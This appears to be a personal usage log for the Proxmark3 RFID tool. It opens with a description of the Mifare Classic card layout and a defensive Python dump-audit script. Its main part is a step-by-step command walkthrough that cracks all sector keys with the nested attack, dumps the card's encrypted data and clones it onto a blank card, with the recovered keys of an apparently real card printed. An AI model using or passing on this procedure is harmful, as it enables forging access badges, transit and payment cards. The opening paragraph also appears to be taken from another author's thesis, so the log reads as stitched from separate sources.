Proxmark3 Usage Log

What is Proxmark3

The Proxmark III is a device developed by Jonathan Westhues that enables sniffing, reading and cloning of RFID (Radio Frequency Identification) tags. For my master's thesis I wanted to look at the communication of Mifare Classic cards. Mifare Classic is used in many applications and is the most popular contactless card around. It is used in e-ticketing, public transport and access control. The higher-level protocol is kept secret by the manufacturer (NXP). I made an implementation of the ISO14443 type A standard for the Proxmark since Mifare is based on this communication standard.

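What is an M1 Card

An M1 card has 16 sectors, numbered 0-15. Each sector has 4 blocks, numbered 0-3, and each block holds 16 bytes. Block 3 of every sector stores Key A, Key B and the access (control) bits. The M1 card lets each sector be protected by its own independent pair of keys, which allows more flexible control over data operations; the access bits are the value computed from the detailed permissions of that sector. Every M1 card has a globally unique UID, stored in block 0 of sector 0, also called the manufacturer block. The first 4 bytes of this block are the card's UID, the 5th byte is the check byte for the UID, and the rest is manufacturer data. This block is write-protected before the card leaves the factory, so it can be read but not modified. There are exceptions, of course: a special kind of card called a UID card has no protection on the UID; these are simply cards that the manufacturer did not produce according to the specification.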
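The layout described above, as an added example that is not part of the original log: a parser that checks the UID check byte and reports, per sector, whether the trailer still uses the factory default key or has inconsistent access bits. It assumes a raw 1024-byte image with the keys filled into each trailer and the standard trailer byte order (Key A in bytes 0-5, access bits in 6-8, Key B in 10-15); the function names are hypothetical and the sample dump is constructed.

```python
# Added example: audit a Mifare Classic 1K dump (1024 bytes) against the layout above.
BLOCK, BLOCKS_PER_SECTOR, SECTORS = 16, 4, 16
DEFAULT_KEY = bytes.fromhex("ffffffffffff")  # factory default key

def access_bits_valid(ab: bytes) -> bool:
    """Bytes 6-8 of a trailer store the C1..C3 nibbles plus their bitwise inverses."""
    c1, c2, c3 = ab[1] >> 4, ab[2] & 0xF, ab[2] >> 4
    n1, n2, n3 = ab[0] & 0xF, ab[0] >> 4, ab[1] & 0xF
    return (c1 ^ n1, c2 ^ n2, c3 ^ n3) == (0xF, 0xF, 0xF)

def parse_dump(dump: bytes) -> dict:
    if len(dump) != BLOCK * BLOCKS_PER_SECTOR * SECTORS:
        raise ValueError("expected a 1024-byte Mifare Classic 1K dump")
    uid, bcc = dump[:4], dump[4]            # manufacturer block: UID, then check byte
    sectors = []
    for s in range(SECTORS):
        off = (s * BLOCKS_PER_SECTOR + 3) * BLOCK    # block 3 = sector trailer
        t = dump[off:off + BLOCK]
        key_a, ab, key_b = t[0:6], t[6:9], t[10:16]  # byte 9 is a general-purpose byte
        sectors.append({"sector": s, "key_a": key_a.hex(), "key_b": key_b.hex(),
                        "access_ok": access_bits_valid(ab),
                        "default_key": DEFAULT_KEY in (key_a, key_b)})
    return {"uid": uid.hex(), "bcc_ok": bcc == uid[0] ^ uid[1] ^ uid[2] ^ uid[3],
            "sectors": sectors}

def findings(report: dict) -> dict:
    """Sector numbers a card issuer would want to fix before deployment."""
    secs = report["sectors"]
    return {"default_key": [x["sector"] for x in secs if x["default_key"]],
            "bad_access_bits": [x["sector"] for x in secs if not x["access_ok"]]}

def build_sample_dump() -> bytes:
    """Constructed sample data, not taken from any real card."""
    d = bytearray(BLOCK * BLOCKS_PER_SECTOR * SECTORS)
    d[0:5] = bytes.fromhex("0102030404")              # UID 01020304, check byte 0x04
    default_trailer = bytes.fromhex("ffffffffffff" "ff0780" "69" "ffffffffffff")
    for s in range(SECTORS):
        off = (s * BLOCKS_PER_SECTOR + 3) * BLOCK
        d[off:off + BLOCK] = default_trailer
    off2 = (2 * BLOCKS_PER_SECTOR + 3) * BLOCK        # sector 2: non-default keys
    d[off2:off2 + BLOCK] = bytes.fromhex("112233445566" "ff0780" "69" "665544332211")
    off5 = (5 * BLOCKS_PER_SECTOR + 3) * BLOCK        # sector 5: inconsistent access bits
    d[off5 + 8] = 0x81
    return bytes(d)

if __name__ == "__main__":
    rep = parse_dump(build_sample_dump())
    print(rep["uid"], rep["bcc_ok"], findings(rep))
```

On the constructed sample, every sector except sector 2 is reported as still using the default key, and sector 5 is reported for access bits whose stored inverse does not match.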

Logs


// Check the antenna's working status and frequency
proxmark3> hw tune

// Read the card according to the 14a standard
proxmark3> hf 14a reader

// Test the existing sectors with the default keys
proxmark3> hf mf chk *1 ? t

// Sniff a key using the default key of block 7
proxmark3> hf mf nested o 0x07 1 ffffffffffff 1 A

// Use the sniffed key to dump the keys of all sectors
proxmark3> hf mf nested 1 0 A c5f2251a1111 d

|---|----------------|---|----------------|---|          
|sec|key A           |res|key B           |res|          
|---|----------------|---|----------------|---|          
|000|  bf1ebb3a1111  | 1 |  bf1ebb3a1111  | 1 |          
|001|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|002|  201409032014  | 1 |  ef53cad2923f  | 1 |          
|003|  201409032014  | 1 |  ef53cad2923f  | 1 |          
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|008|  863ffa384048  | 1 |  1834746affe8  | 1 |          
|009|  863ffa384048  | 1 |  1834746affe8  | 1 |          
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|015|  201409032014  | 1 |  ef53cad2923f  | 1 |          
|---|----------------|---|----------------|---|          
Printing keys to bynary file dumpkeys.bin...  

// Read the encrypted data on the card using dumpkeys.bin
proxmark3> hf mf dump
|-----------------------------------------|          
|------ Reading sector access bits...-----|          
|-----------------------------------------|          
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED 

exit

do something here...

// Convert the data for cloning the card
python pm3_mfd2eml.py dumpdata.bin test.eml

// Clone the data to a new card
proxmark3> hf mf cload test

